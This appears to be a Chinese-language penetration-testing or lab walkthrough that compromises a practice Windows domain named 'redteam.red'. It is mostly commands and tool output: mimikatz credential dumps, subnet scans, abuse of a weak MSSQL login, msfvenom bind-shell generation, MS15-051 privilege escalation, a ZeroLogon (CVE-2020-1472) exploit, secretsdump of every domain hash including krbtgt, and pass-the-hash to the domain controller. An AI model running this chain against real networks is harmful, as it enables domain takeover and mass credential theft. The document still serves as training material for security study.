meterpreter > shell``Process 2540 created.``Channel 1 created.``Microsoft Windows [�汾 6.1.7601]``��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����``   ``C:\Windows\system32>chcp 65001``chcp 65001``Active code page: 65001``   ``C:\Windows\system32>ipconfig /all``ipconfig /all``   ``Windows IP Configuration``   `   `Host Name . . . . . . . . . . . . : work-7`   `Primary Dns Suffix  . . . . . . . : redteam.red`   `Node Type . . . . . . . . . . . . : Hybrid`   `IP Routing Enabled. . . . . . . . : No`   `WINS Proxy Enabled. . . . . . . . : No`   `DNS Suffix Search List. . . . . . : redteam.red``   ``Ethernet adapter �������� 2:``   `   `Connection-specific DNS Suffix  . :``   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2`   `Physical Address. . . . . . . . . : 00-0C-29-91-D2-55`   `DHCP Enabled. . . . . . . . . . . : No`   `Autoconfiguration Enabled . . . . : Yes`   `Link-local IPv6 Address . . . . . : fe80::7421:fef:3e08:acb8%16(Preferred)``    IPv4 Address. . . . . . . . . . . : 10.10.20.7(Preferred)  ``   Subnet Mask . . . . . . . . . . . : 255.255.255.0`   `Default Gateway . . . . . . . . . : 10.10.20.1`   `DHCPv6 IAID . . . . . . . . . . . : 352324649`   `DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-16-A9-45-00-0C-29-55-52-E9`   `DNS Servers . . . . . . . . . . . : 10.10.20.12`   `NetBIOS over Tcpip. . . . . . . . : Enabled``   ``Ethernet adapter ��������:``   `   `Connection-specific DNS Suffix  . :``   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection`   `Physical Address. . . . . . . . . : 00-0C-29-91-D2-4B`   `DHCP Enabled. . . . . . . . . . . : No`   `Autoconfiguration Enabled . . . . : Yes`   `Link-local IPv6 Address . . . . . : fe80::60d4:f2c1:70a7:195f%11(Preferred)``    IPv4 Address. . . . . . . . . . . : 10.10.10.7(Preferred)  ``   Subnet Mask . . . . . . . . . . . : 255.255.255.0`   `Default Gateway . . . . . . . . . : 10.10.10.1`   `DHCPv6 IAID . . . . . . . . . . . : 234884137`   `DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-16-A9-45-00-0C-29-55-52-E9`   `DNS Servers . . . . . . . . . . . : 10.10.10.8`   `NetBIOS over Tcpip. . . . . . . . : Enabled``   ``Tunnel adapter isatap.{28CA7395-A741-4E5A-BC50-6AAB69E7B927}:``   `   `Media State . . . . . . . . . . . : Media disconnected`   `Connection-specific DNS Suffix  . :``   Description . . . . . . . . . . . : Microsoft ISATAP Adapter`   `Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0`   `DHCP Enabled. . . . . . . . . . . : No`   `Autoconfiguration Enabled . . . . : Yes``   ``Tunnel adapter isatap.{6A2D8ACA-7DC5-49AC-8DF3-95C9F384D974}:``   `   `Media State . . . . . . . . . . . : Media disconnected`   `Connection-specific DNS Suffix  . :``   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2`   `Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0`   `DHCP Enabled. . . . . . . . . . . : No`   `Autoconfiguration Enabled . . . . : Yes

可以看到当前机器在redteam.red域中,还有一张网卡IP为10.10.10.7,存在一个10.10.10.x内网

域信息搜集

使用kiwi抓取密码

meterpreter > load kiwi``Loading extension kiwi...`  `.#####.   mimikatz 2.2.0 20191125 (x64/windows)` `.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)` ``## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )`` `## \ / ##       > http://blog.gentilkiwi.com/mimikatz` `'## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )`  `'#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/``   ``Success.``meterpreter > kiwi_cmd sekurlsa::logonpasswords``   ``......``Authentication Id : 0 ; 143262 (00000000:00022f9e)``Session           : Interactive from 1``User Name         : saul``Domain            : REDTEAM``Logon Server      : OWA``Logon Time        : 2024/3/25 10:01:22``SID               : S-1-5-21-1359007890-1682372173-1631803504-1135`        `msv :`         `[00000003] Primary`         `* Username : saul`         `* Domain   : REDTEAM`         `* LM       : e90127c07127ed12f4ebf668acca53e9`         `* NTLM     : 518b98ad4178a53695dc997aa02d455c`         `* SHA1     : 39aa99a9e2a53ffcbe1b9eb411e8176681d01c39`        `tspkg :`         `* Username : saul`         `* Domain   : REDTEAM`         `* Password : admin!@#45`        `wdigest :`         `* Username : saul`         `* Domain   : REDTEAM`         `* Password : admin!@#45`        `kerberos :`         `* Username : saul`         `* Domain   : REDTEAM.RED`         `* Password : admin!@#45`        `ssp :`        `credman :``   ``......

得到一个域用户REDTEAM\saul:admin!@#45

上传一个nbtscan,扫描一下10.10.10.0/24

meterpreter > upload /root/桌面/nbtscan.exe c:\\``[*] Uploading  : /root/桌面/nbtscan.exe -> c:\nbtscan.exe`                                                                                                                                    `[*] Completed  : /root/桌面/nbtscan.exe -> c:\nbtscan.exe`                                                                                                                                    `meterpreter > shell`                                                                                                                                                                          `Process 2876 created.`                                                                                                                                                                        `Channel 3 created.`                                                                                                                                                                           `Microsoft Windows [�汾 6.1.7601]`                                                                                                                                                             `��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����`                                                                                                                                        `   ``C:\Windows\system32>chcp 65001`                                                                                                                                                               `chcp 65001``Active code page: 65001``   ``C:\Windows\system32>c:/nbtscan 10.10.10.0/24``c:/nbtscan 10.10.10.0/24``Doing NBT name scan for addresses from 10.10.10.0/24``   ``IP address       NetBIOS Name     Server    User             MAC address`      `------------------------------------------------------------------------------``10.10.10.7       WORK-7           <server>  <unknown>        00-0c-29-91-d2-4b``10.10.10.8       OWA              <server>  <unknown>        00-0c-29-ba-97-51``10.10.10.18      SQLSERVER-2008   <server>  <unknown>        00-0c-29-85-c6-a0

当前网段还有OWA:10.10.10.8、SQLSERVER-2008:10.10.10.18两台机器

查看域时间,定位到域控为OWA:10.10.10.8这台机器

C:\Windows\system32>net time /domain``net time /domain``Current time at \\owa.redteam.red is 2024/3/25 10:57:56``   ``The command completed successfully.

上传fscan扫描内网

meterpreter > upload /root/桌面/fscan.exe c:\\``[*] Uploading  : /root/桌面/fscan.exe -> c:\fscan.exe`                                                                                                                                        `[*] Completed  : /root/桌面/fscan.exe -> c:\fscan.exe`                                                                                                                                        `meterpreter > shell`                                                                                                                                                                          `Process 2480 created.`                                                                                                                                                                        `Channel 5 created.`                                                                                                                                                                           `Microsoft Windows [�汾 6.1.7601]``��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����``   ``C:\Windows\system32>chcp 65001``chcp 65001``Active code page: 65001``   ``C:\Windows\system32>c:/fscan.exe -h 10.10.10.0/24``c:/fscan.exe -h 10.10.10.0/24``   `   `___                              _``   / _ \     ___  ___ _ __ __ _  ___| | __  ```/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /```/ /_\\_____\__ \ (__| | | (_| | (__|   <`    `\____/     |___/\___|_|  \__,_|\___|_|\_\   ``                     fscan version: 1.8.1``start infoscan``(icmp) Target 10.10.10.7      is alive``(icmp) Target 10.10.10.8      is alive``(icmp) Target 10.10.10.18     is alive``[*] Icmp alive hosts len is: 3``10.10.10.8:808 open``10.10.10.8:88 open``10.10.10.18:1433 open``10.10.10.18:445 open``10.10.10.8:445 open``10.10.10.8:139 open``10.10.10.7:445 open``10.10.10.18:139 open``10.10.10.8:443 open``10.10.10.7:139 open``10.10.10.18:135 open``10.10.10.8:135 open``10.10.10.7:135 open``10.10.10.18:80 open``10.10.10.8:80 open``10.10.10.8:8172 open``[*] alive ports len is: 16``start vulscan``[+] NetInfo:``[*]10.10.10.7`   `[->]work-7`   `[->]10.10.20.7`   `[->]10.10.10.7``[+] NetInfo:``[*]10.10.10.18`   `[->]sqlserver-2008`   `[->]10.10.10.18``[+] NetInfo:``[*]10.10.10.8`   `[->]owa`   `[->]10.10.10.8``[+] 10.10.10.7  MS17-010        (Windows 7 Ultimate 7601 Service Pack 1)``[*] 10.10.10.7           __MSBROWSE__\WORK-7            Windows 7 Ultimate 7601 Service Pack 1``[*] 10.10.10.8  (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)``[*] 10.10.10.8     [+]DC REDTEAM\OWA               Windows Server 2008 R2 Datacenter 7601 Service Pack 1``[*] WebTitle:http://10.10.10.8         code:403 len:1157   title:403 - 禁止访问: 访问被拒绝。``[*] 10.10.10.18  (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)``[*] 10.10.10.18          REDTEAM\SQLSERVER-2008    Windows Server 2008 R2 Datacenter 7601 Service Pack 1``[*] WebTitle:https://10.10.10.8        code:200 len:689    title:IIS7``[*] WebTitle:https://10.10.10.8:8172   code:404 len:0      title:None``[*] WebTitle:http://10.10.10.18        code:200 len:689    title:IIS7``[+] mssql:10.10.10.18:1433:sa sa``已完成 16/16``[*] 扫描结束,耗时: 23.1823579s

OWA和SQLSERVER-2008两台机器操作系统均为Windows Server 2008,SQLSERVER-2008上的mssql服务存在弱口令sa:sa

为了能够访问到10.10.10.x网段,先添加路由

eterpreter > run post/multi/manage/autoroute``   ``[*] Running module against WORK-7``[*] Searching for subnets to autoroute.``[+] Route added to subnet 10.10.10.0/255.255.255.0 from host's routing table.``meterpreter >  run autoroute -p``   ``[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.``[!] Example: run post/multi/manage/autoroute OPTION=value [...]``   ``Active Routing Table``====================``   `   `Subnet             Netmask            Gateway`   `------             -------            -------`   `10.10.10.0         255.255.255.0      Session 3`   `10.10.20.0         255.255.255.0      Session 1

因为之前开启过socks5代理,并且已经添加了10.10.10.x网段的路由,现在通过socks5代理已经可以访问到10.10.10.x网段下的机器了

配置一下proxychains4

vim /etc/proxychains4.conf``# 在最下面添加``socks5 172.20.4.16 1080

XpCmdshell上线SQLSERVER-2008

使用MDUT测试一下连接10.10.10.18的Mssql

https://github.com/SafeGroceryStore/MDUT

proxychains4 java -jar Multiple.Database.Utilization.Tools-2.1.1-jar-with-dependencies.jar

当前用户为nt authority\network service,权限不大

查看一下系统信息

msf生成正向连接后门

msfvenom -p windows/x64/meterpreter/bind_tcp lhost=172.20.4.16 lport=7777 -f exe > 7777.exe

将7777.exe上传到C:/Users/Public/目录

msf监听

msf6 > use exploit/multi/handler``msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp``msf6 exploit(multi/handler) > set rhost 10.10.10.18``msf6 exploit(multi/handler) > set lport 7777``msf6 exploit(multi/handler) > run

同时使用MDUT命令执行运行7777.exe

msf得到一个NT AUTHORITY\NETWORK SERVICE权限的meterpreter

MS15-051提权

挂起当前会话,使用MS15-051进行提权

meterpreter > background` `[*] Backgrounding session 4...``msf6 > use windows/local/ms15_051_client_copy_image``msf6 exploit(windows/local/ms15_051_client_copy_image) > set payload windows/x64/meterpreter/bind_tcp``msf6 exploit(windows/local/ms15_051_client_copy_image) > set session 4``msf6 exploit(windows/local/ms15_051_client_copy_image) > set lport 8888``msf6 exploit(windows/local/ms15_051_client_copy_image) > set rhost 10.10.10.18``msf6 exploit(windows/local/ms15_051_client_copy_image) > set target 1``msf6 exploit(windows/local/ms15_051_client_copy_image) > run

拿到一个SYSTEM权限的meterpreter

使用kiwi抓密码

meterpreter > load kiwi``Loading extension kiwi...`  `.#####.   mimikatz 2.2.0 20191125 (x64/windows)` `.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)` ``## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )`` `## \ / ##       > http://blog.gentilkiwi.com/mimikatz` `'## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )`  `'#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/``   ``Success.``meterpreter > kiwi_cmd sekurlsa::logonpasswords``   ``......``   ``Authentication Id : 0 ; 324139 (00000000:0004f22b)``Session           : Interactive from 1``User Name         : sqlserver``Domain            : REDTEAM``Logon Server      : OWA``Logon Time        : 2024/3/24 12:56:33``SID               : S-1-5-21-1359007890-1682372173-1631803504-1126`        `msv :`         `[00000003] Primary`         `* Username : sqlserver`         `* Domain   : REDTEAM`         `* NTLM     : 6a59bf65a4957ac67e5fb4e1c221939c`         `* SHA1     : d2adadd7aefc533ef3b826c8969d013ff263483f`         `[00010000] CredentialKeys`         `* NTLM     : 6a59bf65a4957ac67e5fb4e1c221939c`         `* SHA1     : d2adadd7aefc533ef3b826c8969d013ff263483f`        `tspkg :`        `wdigest :`         `* Username : sqlserver`         `* Domain   : REDTEAM`         `* Password : Server12345`        `kerberos :`         `* Username : sqlserver`         `* Domain   : REDTEAM.RED`         `* Password : Server12345`        `ssp :`        `credman :``   ``......

抓到一个域用户REDTEAM\sqlserver:Server12345

CVE-2020-1472 ZeroLogon拿下域控

使用zerologon_tester.py走代理验证DC是否存在CVE-2020-1472

proxychains4 python3 zerologon_tester.py owa 10.10.10.8                                                                                                                             1 ⨯``[proxychains] config file found: /etc/proxychains4.conf``[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4``[proxychains] DLL init: proxychains-ng 4.17``Performing authentication attempts...``[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:135  ...  OK``[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:6011  ...  OK``   ``Success! DC can be fully compromised by a Zerologon attack.

使用EXP将域控机器账号重置

proxychains4 python3 cve-2020-1472-exploit.py owa 10.10.10.8``[proxychains] config file found: /etc/proxychains4.conf``[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4``[proxychains] DLL init: proxychains-ng 4.17``Performing authentication attempts...``[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:135  ...  OK``[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:6011  ...  OK``====================================================================================================================================================================================================================================================================================``Target vulnerable, changing account password to empty string``   ``Result: 0``   ``Exploit complete!

使用impacket包中的secretsdump.py导出域内所有用户凭证

proxychains4 python3 secretsdump.py redteam.red/owa\$@10.10.10.8    -no-pass``[proxychains] config file found: /etc/proxychains4.conf``[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4``[proxychains] DLL init: proxychains-ng 4.17``Impacket v0.11.0 - Copyright 2023 Fortra``   ``[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:445  ...  OK``[*] Target system bootKey: 0x4b30f6b8ed622d5a2ef12930e01d238e``[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)``Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c486b8140b308841f22f170d1524268:::``Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::``[*] Dumping cached domain logon information (domain/username:hash)` `proxychains4 python3 secretsdump.py redteam.red/owa\$@10.10.10.8    -no-pass``[*] Dumping LSA Secrets``[*] $MACHINE.ACC` `REDTEAM\OWA$:aes256-cts-hmac-sha1-96:6d0410f99224b2cc6ab6948b0590d28bdd7659966f7fa36777fdc03d95f8c264``REDTEAM\OWA$:aes128-cts-hmac-sha1-96:bb2b7d6592aad185ae0f1f0264f51d11``REDTEAM\OWA$:des-cbc-md5:3425f4c1ad2f19e5``REDTEAM\OWA$:plain_password_hex:029ace5dc91c3c37874f1a968c50f58cde29d543bd28a7ff9b0f32af5d16cb3ede2c04090ec9177c5c9145d43d6ea81b0549b20c8325b8c488f6c0fb83fa12890ae029e539651e632224926a0a4ea8b187350042147c52d6b4ea7eb1139f1f2f8ed8a598442f1e14f7ed2df1b1364f7249a313aafb92884848b2b99d71f075059a649c81b965a5725e07970487607a61f7bd256462d8f6a34f7ab74f6b43dbc4f7631eced9cda9c237e060524dec813aa0ba8d265d1b21e421a1dd3216ac768e49440390b2bdbb256a754dcfce8d7e5309ee5ffc8951c45fdf334f427ffc3f73bd0c8b9734af242d43a9fd29a3818886``REDTEAM\OWA$:aad3b435b51404eeaad3b435b51404ee:cbc48b0b50c4cdd834e6498afd3c39e5:::``[*] DefaultPassword` `(Unknown User):ROOT#123``[*] DPAPI_SYSTEM` `dpapi_machinekey:0xd9d2844fee5220c64134c4dd6af1cef55ca83c32``dpapi_userkey:0x972935b9a0f29be77b88a5e9aafaab1068649a3a``[*] L$ASP.NETAutoGenKeys2.0.50727.5420 ```0000   E3 1A 39 7D 76 DF A9 6E  B9 58 F9 0F BC 7D C5 60   ..9}v..n.X...}.` `` `0010   BA BA E6 BD 15 DE 26 D9  26 81 04 86 C5 50 00 1A   ......&.&....P..` `0020   11 98 C0 BD 1E CE 1F 0E  CC A4 08 EF 5E 7A 42 F6   ............^zB.` `0030   BD 96 83 8A 75 85 FF F6  FC 33 F0 8B 4B A5 1A 11   ....u....3..K...` `0040   4B 68 BD 65 25 8E 23 69  20 E0 2A 88 3A 02 0D C4   Kh.e%.#i .*.:...` `0050   84 CF F5 E1 50 79 E6 04                            ....Py..``L$ASP.NETAutoGenKeys2.0.50727.5420:e31a397d76dfa96eb958f90fbc7dc560babae6bd15de26d926810486c550001a1198c0bd1ece1f0ecca408ef5e7a42f6bd96838a7585fff6fc33f08b4ba51a114b68bd65258e236920e02a883a020dc484cff5e15079e604``[*] NL$KM `` 0000   C2 09 A6 FB 68 5E 76 E3  CA CF 0D 64 C3 3F 97 15   ....h^v....d.?..` `0010   57 BF 0B 8A 2C 5E 84 D6  CC 42 EC DF E3 7A F9 9B   W...,^...B...z..` `0020   AE 8A D4 88 7F B1 DF D7  42 CD DB CE 07 57 3C 4C   ........B....W<L` `0030   10 E0 0A F9 C8 C7 7F 25  39 6B DC 3D 6D 3E 9D 7F   .......%9k.=m>..``NL$KM:c209a6fb685e76e3cacf0d64c33f971557bf0b8a2c5e84d6cc42ecdfe37af99bae8ad4887fb1dfd742cddbce07573c4c10e00af9c8c77f25396bdc3d6d3e9d7f``[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)``[*] Using the DRSUAPI method to get NTDS.DIT secrets``[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:135  ...  OK``[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:6008  ...  OK``redteam.red\Administrator:500:aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7:::``Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::``krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a67f14d5cc4fa22618c8b609e832db6:::``redteam.red\SM_4c09f7e38ef84c22b:1120:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::``redteam.red\SM_dfb6b69905864ca19:1121:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::``redteam.red\SM_958e768f5a2e4c9fb:1122:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::``redteam.red\SM_645db7f160894c7fb:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::``redteam.red\mail:1125:aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c:::``redteam.red\sqlserver:1126:aad3b435b51404eeaad3b435b51404ee:6a59bf65a4957ac67e5fb4e1c221939c:::``redteam.red\saulgoodman:1128:aad3b435b51404eeaad3b435b51404ee:c0e1f147edf7462134f07e389c5466e2:::``redteam.red\gu:1129:aad3b435b51404eeaad3b435b51404ee:82a28aff9a3be5385b87c4928b54a66f:::``redteam.red\apt404:1130:aad3b435b51404eeaad3b435b51404ee:ba0b26eb2595bc0a639d986537433e5d:::``redteam.red\adduser:1131:aad3b435b51404eeaad3b435b51404ee:168df3659b5f75ab35645606839e5677:::``redteam.red\saul:1135:aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c:::``OWA$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::``SQLSERVER-2008$:1127:aad3b435b51404eeaad3b435b51404ee:2dae08cafb67b4537b7d5871084c961d:::``WORK-7$:1138:aad3b435b51404eeaad3b435b51404ee:f085f13639b3de3c78de926c0719d36d:::``[*] Kerberos keys grabbed``redteam.red\Administrator:aes256-cts-hmac-sha1-96:7b784eb6783613652dff21340a86f80f8ef482c32e3198e7bbc03c2f4b46cc35``redteam.red\Administrator:aes128-cts-hmac-sha1-96:6e5b9a2228738bb07d101196f45bacd3``redteam.red\Administrator:des-cbc-md5:b3b35bb389542fae``redteam.red\Administrator:rc4_hmac:ccef208c6485269c20db2cad21734fe7``krbtgt:aes256-cts-hmac-sha1-96:67075a54cf9106904392e010bcd3caec5cc3d57d3c65b42065482ae53910ddbd``krbtgt:aes128-cts-hmac-sha1-96:0513db3ca29c78c0dff2295e5ac0388c``krbtgt:des-cbc-md5:f2fee9b529703e67``krbtgt:rc4_hmac:4a67f14d5cc4fa22618c8b609e832db6``redteam.red\mail:aes256-cts-hmac-sha1-96:67e9681e2ac218777ce23d469f4ca87c5288c5931251d1856007e65e9bf7d2b5``redteam.red\mail:aes128-cts-hmac-sha1-96:94e286bf0ab9d1980af2707aca2f1a47``redteam.red\mail:des-cbc-md5:1cf4ae8f86ae7a57``redteam.red\mail:rc4_hmac:518b98ad4178a53695dc997aa02d455c``redteam.red\sqlserver:aes256-cts-hmac-sha1-96:8cbec6f7a0bee31aff4125699eac76686eefc0679462538f36fa356d6c5a0bff``redteam.red\sqlserver:aes128-cts-hmac-sha1-96:9f9a23b3cbeecdb578d03edfa0026645``redteam.red\sqlserver:des-cbc-md5:a82fd5942692a26b``redteam.red\sqlserver:rc4_hmac:6a59bf65a4957ac67e5fb4e1c221939c``redteam.red\saulgoodman:aes256-cts-hmac-sha1-96:9a83bbd25f7d5389c6a34f22a06dcb227b553bbf1ed474fc2015ce5887709e66``redteam.red\saulgoodman:aes128-cts-hmac-sha1-96:7eb9516a11ec08e76c9c082984f46ec2``redteam.red\saulgoodman:des-cbc-md5:648ae0c18552e098``redteam.red\saulgoodman:rc4_hmac:c0e1f147edf7462134f07e389c5466e2``redteam.red\gu:aes256-cts-hmac-sha1-96:1518123ec70fdaf12860bf64e1b04b8ae999201bb82235e9a14c4a57678d976d``redteam.red\gu:aes128-cts-hmac-sha1-96:a7b34ec3bea5e0c3d7d513e6586b5aba``redteam.red\gu:des-cbc-md5:a140a754d9a4ad5e``redteam.red\gu:rc4_hmac:82a28aff9a3be5385b87c4928b54a66f``redteam.red\apt404:aes256-cts-hmac-sha1-96:52f7cad15cf6b51fb59b6df3197a9d985f644103bf7579122763930c4bd8abf4``redteam.red\apt404:aes128-cts-hmac-sha1-96:747e129fb486e7a580eb10b626f9c825``redteam.red\apt404:des-cbc-md5:ea25a4206d515ed5``redteam.red\apt404:rc4_hmac:ba0b26eb2595bc0a639d986537433e5d``redteam.red\adduser:aes256-cts-hmac-sha1-96:b01407e707eb93f8532b94fee89afd53fad38307aacc3379d354d4881b66b388``redteam.red\adduser:aes128-cts-hmac-sha1-96:a95deab4cb8d649374cd6d069ee33ba1``redteam.red\adduser:des-cbc-md5:b3f7bfa8673445ad``redteam.red\adduser:rc4_hmac:168df3659b5f75ab35645606839e5677``redteam.red\saul:aes256-cts-hmac-sha1-96:d00c6721bf8e23bd9a7590eacb9b6273acceb7cf1fa7b28f7bd0e1f3b886e770``redteam.red\saul:aes128-cts-hmac-sha1-96:5431d09ed23795f4ff41d09e994b5c24``redteam.red\saul:des-cbc-md5:3d8573fb5743ba16``redteam.red\saul:rc4_hmac:518b98ad4178a53695dc997aa02d455c``OWA$:aes256-cts-hmac-sha1-96:1271116d501ec893a7d7ba3f9e7940479e92b7d5891b46cad928ad86db6556f7``OWA$:aes128-cts-hmac-sha1-96:7a3a3427c735a644b1b529d47b2e56d2``OWA$:des-cbc-md5:8c80267f97f48a10``OWA$:rc4_hmac:31d6cfe0d16ae931b73c59d7e0c089c0``SQLSERVER-2008$:aes256-cts-hmac-sha1-96:1212a6c60c8d9c77d6b97ea431a57671860c38490085f31236e62ac81af83064``SQLSERVER-2008$:aes128-cts-hmac-sha1-96:802c860d60b37ce3b3bdef19e8a7c45f``SQLSERVER-2008$:des-cbc-md5:640b685e9e1c5bfe``SQLSERVER-2008$:rc4_hmac:2dae08cafb67b4537b7d5871084c961d``WORK-7$:aes256-cts-hmac-sha1-96:3db39e59a08bb731c708a72d183c266a6bd03badd75369ff96eb18817f59153c``WORK-7$:aes128-cts-hmac-sha1-96:b5252b1abc361879091a6b385304dec0``WORK-7$:des-cbc-md5:1a2f37d5a4409175``WORK-7$:rc4_hmac:f085f13639b3de3c78de926c0719d36d``[*] Cleaning up...

得到域管的hash

redteam.red\Administrator:500:aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7:::

利用wmiexec脚本登陆,获取到域控的shell,域管理员权限

proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7 redteam.red/administrator@10.10.10.8``[proxychains] config file found: /etc/proxychains4.conf``[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4``[proxychains] DLL init: proxychains-ng 4.17``Impacket v0.11.0 - Copyright 2023 Fortra``   ``[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:445  ...  OK``[*] SMBv2.1 dialect used``[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:135  ...  OK``[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:6007  ...  OK``[!] Launching semi-interactive shell - Careful what you execute``[!] Press help for extra shell commands``C:\>whoami``redteam\administrator``

查看桌面的flag

最后就需要恢复域控的密码了

导出注册表

reg save HKLM\SYSTEM system.save``reg save HKLM\SAM sam.save``reg save HKLM\SECURITY security.save

lget下载到本地

lget system.save``lget sam.save``lget security.save

删除目标机器上保存的注册表文件

del /f system.save``del /f sam.save``del /f security.save

通过sam.save、security.save、system.save获得域控原本的NTLM哈希值

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL``Impacket v0.11.0 - Copyright 2023 Fortra``   ``[*] Target system bootKey: 0x4b30f6b8ed622d5a2ef12930e01d238e``[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)``Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c486b8140b308841f22f170d1524268:::``Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::``[*] Dumping cached domain logon information (domain/username:hash)``[*] Dumping LSA Secrets``[*] $MACHINE.ACC` `$MACHINE.ACC:plain_password_hex:029ace5dc91c3c37874f1a968c50f58cde29d543bd28a7ff9b0f32af5d16cb3ede2c04090ec9177c5c9145d43d6ea81b0549b20c8325b8c488f6c0fb83fa12890ae029e539651e632224926a0a4ea8b187350042147c52d6b4ea7eb1139f1f2f8ed8a598442f1e14f7ed2df1b1364f7249a313aafb92884848b2b99d71f075059a649c81b965a5725e07970487607a61f7bd256462d8f6a34f7ab74f6b43dbc4f7631eced9cda9c237e060524dec813aa0ba8d265d1b21e421a1dd3216ac768e49440390b2bdbb256a754dcfce8d7e5309ee5ffc8951c45fdf334f427ffc3f73bd0c8b9734af242d43a9fd29a3818886``$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:cbc48b0b50c4cdd834e6498afd3c39e5``[*] DefaultPassword` `(Unknown User):ROOT#123``[*] DPAPI_SYSTEM` `dpapi_machinekey:0xd9d2844fee5220c64134c4dd6af1cef55ca83c32``dpapi_userkey:0x972935b9a0f29be77b88a5e9aafaab1068649a3a``[*] L$ASP.NETAutoGenKeys2.0.50727.5420 ```0000   E3 1A 39 7D 76 DF A9 6E  B9 58 F9 0F BC 7D C5 60   ..9}v..n.X...}.` `` `0010   BA BA E6 BD 15 DE 26 D9  26 81 04 86 C5 50 00 1A   ......&.&....P..` `0020   11 98 C0 BD 1E CE 1F 0E  CC A4 08 EF 5E 7A 42 F6   ............^zB.` `0030   BD 96 83 8A 75 85 FF F6  FC 33 F0 8B 4B A5 1A 11   ....u....3..K...` `0040   4B 68 BD 65 25 8E 23 69  20 E0 2A 88 3A 02 0D C4   Kh.e%.#i .*.:...` `0050   84 CF F5 E1 50 79 E6 04                            ....Py..``L$ASP.NETAutoGenKeys2.0.50727.5420:e31a397d76dfa96eb958f90fbc7dc560babae6bd15de26d926810486c550001a1198c0bd1ece1f0ecca408ef5e7a42f6bd96838a7585fff6fc33f08b4ba51a114b68bd65258e236920e02a883a020dc484cff5e15079e604``[*] NL$KM `` 0000   C2 09 A6 FB 68 5E 76 E3  CA CF 0D 64 C3 3F 97 15   ....h^v....d.?..` `0010   57 BF 0B 8A 2C 5E 84 D6  CC 42 EC DF E3 7A F9 9B   W...,^...B...z..` `0020   AE 8A D4 88 7F B1 DF D7  42 CD DB CE 07 57 3C 4C   ........B....W<L` `0030   10 E0 0A F9 C8 C7 7F 25  39 6B DC 3D 6D 3E 9D 7F   .......%9k.=m>..``NL$KM:c209a6fb685e76e3cacf0d64c33f971557bf0b8a2c5e84d6cc42ecdfe37af99bae8ad4887fb1dfd742cddbce07573c4c10e00af9c8c77f25396bdc3d6d3e9d7f``[*] Cleaning up...

拿到$MACHINE.ACC的值

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:cbc48b0b50c4cdd834e6498afd3c39e5

取出后半段的NTLM进行恢复

proxychains4 python3 reinstall_original_pw.py owa 10.10.10.8 cbc48b0b50c4cdd834e6498afd3c39e5

再次使用impacket中的secretdump.py来尝试导出域内所有用户凭证

